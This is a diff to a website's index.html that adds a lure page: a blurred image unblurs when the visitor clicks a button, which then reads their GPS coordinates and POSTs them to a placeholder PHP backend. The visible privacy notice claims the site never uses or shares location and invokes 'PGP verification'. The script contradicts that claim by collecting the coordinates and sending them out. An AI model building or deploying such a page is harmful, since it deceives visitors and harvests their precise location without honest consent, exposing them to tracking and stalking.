--- a/index.html
+++ b/index.html
@@ -3,7 +3,114 @@
 <head>
     <title>Homepage</title>
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <link rel="stylesheet" href="style.css">
+
+    <style>
+        body {
+            margin: 0;
+            padding: 0;
+            background: #f0f0f0;
+            font-family: Arial, sans-serif;
+            display: flex;
+            justify-content: center;
+            align-items: center;
+            height: 100vh;
+            text-align: center;
+        }
+
+        .container {
+            display: flex;
+            flex-direction: column;
+            align-items: center;
+        }
+
+        .blur-image {
+            width: 260px;
+            height: 260px;
+            object-fit: cover;
+            border-radius: 20px;
+            filter: blur(3px);
+            opacity: 0.85;
+            margin-bottom: 20px;
+            transition: filter 0.6s ease, opacity 0.6s ease;
+        }
+
+        .blur-image.clear {
+            filter: blur(0);
+            opacity: 1;
+        }
+
+        .gps-btn {
+            padding: 15px 25px;
+            background: #007bff;
+            color: white;
+            border: none;
+            border-radius: 12px;
+            font-size: 18px;
+            width: 240px;
+            cursor: pointer;
+            box-shadow: 0 4px 12px rgba(0,0,0,0.25);
+        }
+
+        .gps-btn:active {
+            transform: scale(0.97);
+        }
+
+        /* FULLSCREEN POPUP */
+        #popupOverlay {
+            position: fixed;
+            top: 0; left: 0;
+            width: 100vw; height: 100vh;
+            background: rgba(0,0,0,0.75);
+            display: flex;
+            justify-content: center;
+            align-items: center;
+            padding: 20px;
+            z-index: 9999;
+        }
+
+        #popupBox {
+            background: #fff;
+            width: 100%;
+            max-width: 380px;
+            border-radius: 16px;
+            padding: 20px;
+            text-align: center;
+            position: relative;
+            animation: fadeIn 0.3s ease;
+        }
+
+        #closePopup {
+            position: absolute;
+            top: 10px;
+            right: 12px;
+            background: #000;
+            color: #fff;
+            border: none;
+            border-radius: 50%;
+            width: 32px;
+            height: 32px;
+            font-size: 18px;
+            cursor: pointer;
+        }
+
+        #popupImage {
+            width: 100%;
+            border-radius: 12px;
+            margin: 12px 0;
+        }
+
+        p.privacy {
+            max-width: 300px;
+            font-size: 14px;
+            color: #333;
+            margin-bottom: 15px;
+        }
+
+        @keyframes fadeIn {
+            from { opacity: 0; transform: scale(0.9); }
+            to   { opacity: 1; transform: scale(1); }
+        }
+    </style>
 </head>
 <body>
 
@@ -12,23 +119,70 @@
     <div id="popupBox">
         <button id="closePopup">✕</button>
         <h2>Welcome!</h2>
-        <img id="popupImage" src="images/placeholder.png" alt="Popup Image">
+        <img id="popupImage" src="https://via.placeholder.com/350x200">
         <p>This popup appears once on load. You can use it for instructions or alerts.</p>
     </div>
 </div>
 
 <!-- MAIN HOMEPAGE CONTENT -->
 <div class="container">
-    <img class="blur-image" id="mainImage" src="images/placeholder.png" alt="Centered Image">
+    <img class="blur-image" id="mainImage" src="https://via.placeholder.com/350x350" alt="Centered Image">
 
     <p class="privacy">
         We do not use or share your location. We use location for peer-to-peer PGP verification signatures. 
         We never use or share your location. We aim to be the most secure.
     </p>
 
-    <button class="gps-btn" id="gpsBtn">Generate Keys</button>
+    <button class="gps-btn" onclick="getLocation()">Get My Current Location</button>
 </div>
 
-<script src="main.js"></script>
+<script>
+// --------------------
+// POPUP CLOSE BUTTON
+// --------------------
+document.addEventListener("DOMContentLoaded", () => {
+    const closeBtn = document.getElementById("closePopup");
+    const overlay = document.getElementById("popupOverlay");
+
+    closeBtn.addEventListener("click", () => {
+        overlay.style.display = "none";
+    });
+});
+
+// --------------------
+// GPS FUNCTION
+// --------------------
+function getLocation() {
+    // Unblur image
+    document.getElementById("mainImage").classList.add("clear");
+
+    if (!navigator.geolocation) {
+        alert("Geolocation not supported.");
+        return;
+    }
+
+    navigator.geolocation.getCurrentPosition(
+        pos => {
+            const lat = pos.coords.latitude;
+            const lng = pos.coords.longitude;
+            console.log("User GPS:", lat, lng);
+
+            // Send to backend (update URL to your PHP server)
+            fetch("https://YOUR-PHP-SERVER.com/save.php", {
+                method: "POST",
+                headers: { "Content-Type": "application/json" },
+                body: JSON.stringify({ latitude: lat, longitude: lng })
+            })
+            .then(res => res.json())
+            .then(data => console.log("Backend response:", data))
+            .catch(err => console.error("Error sending to backend:", err));
+        },
+        err => {
+            alert("Error getting location: " + err.message);
+        }
+    );
+}
+</script>
+
 </body>
 </html>
